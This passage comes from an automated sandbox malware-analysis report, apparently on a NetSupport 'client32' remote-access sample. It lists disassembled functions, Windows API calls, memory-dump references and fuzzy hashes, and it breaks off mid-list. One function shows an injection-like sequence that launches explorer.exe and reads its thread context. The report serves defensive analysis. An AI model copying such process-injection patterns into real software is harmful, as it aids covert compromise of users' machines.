                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 6a4558929192b251c5d08b5e804bdc9b61ce28f30961faaa03d70a9527164016
                                                                              • Instruction ID: 622d3808cb19fe645f7705ee54a54b225289d7132215defba9e18c77360d7652
                                                                              • Opcode Fuzzy Hash: 6a4558929192b251c5d08b5e804bdc9b61ce28f30961faaa03d70a9527164016
                                                                              • Instruction Fuzzy Hash: FE213C75E00269EBEB40CE69C88469D7BF5FF44360F14C1AAEC55EB241D774DE408B91
                                                                              Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A78400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                              • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                              • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                              • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                              Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InformationToken
                                                                              • String ID:
                                                                              • API String ID: 4114910276-0
                                                                              • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                              • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                              • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                              • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                              Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 328603210-0
                                                                              • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                              • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                              • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                              • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                              Function 6EF1A082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,6EF16F16,00000000,?,6EF1D40B,00000001,6EF16F16,00000000,00000000,00000000,?,6EF16F16,00000001,00000214), ref: 6EF1A0C5
                                                                                • Part of subcall function 6EF160F9: __getptd_noexit.LIBCMT ref: 6EF160F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 328603210-0
                                                                              • Opcode ID: af42ae2177c49247018dc36026266e9946153c8064c048c08069dc47947c2795
                                                                              • Instruction ID: c0161df93bfbdbbe9e632f95fe2fe64e536fb65988959da48dad45977f9f34ae
                                                                              • Opcode Fuzzy Hash: af42ae2177c49247018dc36026266e9946153c8064c048c08069dc47947c2795
                                                                              • Instruction Fuzzy Hash: A901F53531CA1A9FEB689EB5CC30BD737D4ABC1364F01496EE816D7180DB7694448A80
                                                                              Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __waccess_s
                                                                              • String ID:
                                                                              • API String ID: 4272103461-0
                                                                              • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                              • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                              • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                              • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                              Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __fsopen
                                                                              • String ID:
                                                                              • API String ID: 3646066109-0
                                                                              • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                              • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                              • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                              • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                              Function 00F71000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _NSMClient32@8.PCICL32(?,?,?,00F710A2,00000000), ref: 00F7100B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3402039725.0000000000F71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F70000, based on PE: true
                                                                              • Associated: 00000004.00000002.3402020033.0000000000F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3402065751.0000000000F72000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f70000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Client32@8
                                                                              • String ID:
                                                                              • API String ID: 433899448-0
                                                                              • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                              • Instruction ID: d7d7e992f436387d881cfeaa03c8f3f2edb5168df4a67cd2fd135693d0621af9
                                                                              • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                              • Instruction Fuzzy Hash: C1B092B211434D9B8714EE98EC41C7B339CBA98A00B00490ABD0943282CA65FC70A6B2

                                                                              Non-executed Functions

                                                                              Function 110077A0 Relevance: 86.3, APIs: 35, Strings: 14, Instructions: 548windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
                                                                              • SetCursor.USER32(00000000), ref: 110077F1
                                                                              • GetDC.USER32(?), ref: 1100781D
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                              • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                              • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                              • DeleteDC.GDI32(?), ref: 110079FA
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                              • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                              • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                              • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                              • GetSysColor.USER32(00000004), ref: 11007B50
                                                                              • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67
                                                                                • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • _memset.LIBCMT ref: 11007BC7
                                                                              • _swscanf.LIBCMT ref: 11007C34
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                              • _memset.LIBCMT ref: 11007C8C
                                                                              • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                              • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                              • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                              • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                              • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                              • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                              • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                              • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                              • UpdateWindow.USER32(?), ref: 11007EF2
                                                                              • SetCursor.USER32(?), ref: 11007EFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                              • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2635354838-2303488826
                                                                              • Opcode ID: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                              • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                              • Opcode Fuzzy Hash: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                              • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                              Function 111273E0 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 11127400
                                                                              • _memset.LIBCMT ref: 1112741D
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                              • _strrchr.LIBCMT ref: 111274AA
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                              • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                              • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                              • wsprintfA.USER32 ref: 11127561
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                              • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                              • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                              • _strrchr.LIBCMT ref: 111276AB
                                                                              • _memmove.LIBCMT ref: 11127724
                                                                              • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
